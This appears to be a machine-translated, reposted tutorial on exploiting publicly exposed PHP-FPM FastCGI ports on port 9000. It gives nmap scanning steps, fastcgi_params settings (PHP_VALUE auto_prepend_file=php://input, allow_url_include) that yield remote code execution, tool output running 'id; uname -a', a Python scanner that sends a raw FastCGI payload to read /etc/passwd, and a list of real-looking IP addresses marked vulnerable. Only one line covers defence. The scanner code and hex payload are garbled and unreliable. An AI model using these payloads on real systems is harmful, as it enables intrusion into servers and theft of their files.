Example parsing of Python scan script for fastcgi file read vulnerability

This article mainly describes the fastcgi file read the vulnerability of the Python scan script, the need for friends can refer to the following

Remote use of PHP fastcgi

When it comes to fastcgi, we all know that this is one of the most common webserver dynamic script execution models available. Basically all Web scripts currently support this pattern, and even some type scripts are the only pattern (Ror,python, etc.).

The main purpose of FASTCGI is to separate the execution of webserver and dynamic languages into two different resident processes, and when webserver receives a request for a dynamic script, the request is forwarded over the network via the FCGI protocol to the FCGI process, which is processed by the fcgi process. The result is then passed to the webserver, and then the webserver is output to the browser. This model because not every request to restart the CGI, do not embed the script parser into the webserver, so scalability is very strong, once the dynamic script request volume increases, you can set up a single cluster of the back-end fcgi process to provide services, greatly increased maintainability, This is one of the reasons why fcgi and other similar patterns are so popular.

However, it is because of this model, but also brings a number of problems. For example, the "Nginx File Parsing Vulnerability" released by 80sec last year is actually a problem because of fcgi and Webserver's understanding of the script path-level parameters. In addition, since fcgi and webserver are communicated through the network, more and more clusters will be fcgi directly on the public web, and everyone can access it. This means that anyone can pretend to be webserver and let fcgi execute the script content we want to execute.

OK, the above is the background principle explanation, I here with my most familiar PHP to you to do an example.

PHP's fastcgi is usually called FPM. The port he listens to by default is Port 9000. Here we use Nmap to scan directly:

NMAP-SV-P 9000--open x.x.x.x/24

Why use SV? Because there may be other services on port 9000, it is necessary to use Nmap fingerprint identification to help us identify it first.

[root@test:~/work/fcgi] #nmap-sv-p 9000--open 173.xxx.xxx.1/24starting nmap 6.01 (http://nmap.org) at 2012-09-14 20:06 Edtnmap Scan Report for abc.net (173.xxx.xxx.111) Host was up (0.0095s latency). PORT State     Service version9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Protocol 2.0) Service Info:OS:Lin Ux Cpe:cpe:/o:linux:kernelnmap Scan Report for abc.com (173.xxx.xxx.183) Host was up (0.0096s latency). PORT State     SERVICE    version9000/tcp open  tcpwrappedservice detection performed. Incorrect results at http://nmap.org/submit/. Nmap done:256 IP addresses (198 hosts up) scanned in 7.70 seconds

Random scan, good luck, a C segment has 2 open 9000 ports, but one of them is the administrator modified sshd, another tcpwrapped, is our goal.

In order to do the test, I wrote a fastcgi client program, which initiated the request directly to the other party. What can we do with an open fastcgi? This is a bit different from the normal HTTP request because webserver, in order to provide fastcgi parameters, passes the Fastcgi_params packet to the FCGI process each time the request is forwarded. Originally these parameters are the user is not controllable, but since this fcgi open to the outside, it also means that we can set these parameters, let us do something that could not be done:

[Root@test:~/work/fcgi]#./fcgi_exp Read 173.xxx.xxx.183 9000/etc/issuex-powered-by:php/ 5.3.2-1ubuntu4.9content-type:text/html Www.jb51.netUbuntu 10.04.3 LTS \ \l

Read the/etc/issue file and you can see that this is an Ubuntu 10.04 machine. And how did that come about? In fact, as long as we are in Fastcgi_params, set Document_root as "/" root directory, and then set Script_filename to/etc/issue. So, as long as we have permission, we can control the fcgi to read any file on this machine. It's not actually read, it's done with PHP.

Since it is executed, so the vulnerability is similar to a common Lfi vulnerability, if you know the log path on this machine, or any file path you can control the content, you can execute arbitrary code.

Is that it? No, if it is not convenient to use log or to guess other file paths to execute code, is there a more convenient way for me to execute arbitrary code I submit?

Here I also find a lot of ways, the first thought is to pass the env parameter past and then go to execute the/proc/self/environ file, unfortunately php-fpm after receiving my parameter value only in memory modified environment variable, and will not directly change the file. So it can't be exploited. And it's not all systems that are common in this way.

We also have a way to remotely execute arbitrary files in the POC and technical challenges of cve-2012-1823 (php-cgi RCE), which I wrote earlier, by dynamically modifying the values of Auto_prepend_file in php.ini. Turning a lfi vulnerability into an RFI will greatly increase the amount of space available for use.

Does the fastcgi also support similar dynamic PHP configuration changes? I checked the information, found that the original FPM is not supported, until a developer submitted a bug,php official to merge this feature into the source of PHP 5.3.3.

Universal by setting Fastcgi_params, we can use Php_admin_value and php_value to dynamically modify PHP settings.

env["Request_method"] = "POST"
env["Php_value"] = "Auto_prepend_file = php://input"
env["Php_admin_value"] = "Allow_url_include = on\ndisable_functions = \nsafe_mode = Off"

Use the Execute php://input and then write our PHP code in the Post's content so that it can be executed directly.

[Root@test:~/work/fcgi]#./fcgi_exp system 127.0.0.1 9000/tmp/a.php "ID; Uname-a "   x-powered-by:php/5.5.0-devcontent-type:text/htmluid=500 (www) gid=500 (www) groups=500 (www) Linux test 2.6.18-308.13.1.el5 #1 SMP Tue 17:51:21 EDT x86_64 x86_64 x86_64 gnu/linux

The careful person will notice some changes here, I changed the machine to do the test. Because the machine that started to discover PHP version is 5.3.2, just below 5.3.3, so the modification INI settings can not be used to execute code, only to guess the path.

Another change is that I'm here to read/tmp/a.php this PHP file instead of going to read/etc/issue. Because at the beginning of the 5.3.9, PHP officially joined a configuration "Security.limit_extensions", by default, only allowed to execute files with the extension ". php". So you have to find a PHP file that already exists. This setting is php-fpm.conf and cannot be overridden by modifying the INI configuration. If anyone has a better way to get around this limit, please let me know.

OK, so far all the tests on PHP-FPM have been completed, and we have taken advantage of an open fcgi process to get the shell directly. You might as well look into other fcgi, and perhaps more.

How can I prevent this vulnerability? Very simple, do not put fcgi interface to public network exposure. It is also hoped that in the future fcgi will have an identity authentication mechanism.

Compile on any system, after installing Golang, execute:
Go Build Fcgi_exp.go

fastcgi file Read Vulnerability Python scan script

FastCGI file read (code execution) is an old vulnerability description: remote use of PHP FastCGI

The vulnerability could be exploited to read system files and even have a chance to execute code successfully. Download the article mentioned above: Fcgi_exp

Protocol details I don't really care, I just need a Python scan script. So took Wireshark to grasp the next Gary's program, write a small piece of code.

The outside network exposes 9000 ports The machine naturally is very very few, but the intranet may possibly.

Import socketimport sysdef test_fastcgi (IP): sock = Socket.socket (socket.af_inet, socket. SOCK_STREAM); Sock.settimeout (5.0) sock.connect ((IP, 9000)) data = "" "01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 01 04 00 01 0  0 8f (0e)------------------5f, 4d, 4f 2f 2e to 0d, 4f, 4d, 4e, 5f, 4f, 4f, 2f, 0b, 4d, 4f, 5f 41 44 44 52 31 32 PNS 2e 2e 2e 0f 0b 10 53 45 5 (5f) 4c + 4e (4d) + 2f/2f + + + 0f 2 5f (4f)-------------------6f, 2f, ata_s = "For _ in Data.split (): data_s = chr (int (_,16)) sock.send (data_s) Try:ret = SOCK.RECV (1024x768) if RET . Find (': root: ') > 0:print ret print '%s is vulnerable! '% IP return True else:return False ex Cept Exception, E:pass Sock.cloSE () if __name__ = = ' __main__ ': If Len (sys.argv) = = 1:print Sys.argv[0], ' [IP] ' else:test_fastcgi (sys.argv[1]) 

With a quick scan of port 9000, several vulnerable machines can be found:

110.164.68.137 is Vul!110.164.68.148 are Vul!110.164.68.149 is Vul!110.164.68.151 are Vul!110.164.68.154 is Vul!110.164 .68.155 is Vul!

Fcgi_exp.exe Read 110.164.68.137 9000/etc/passwd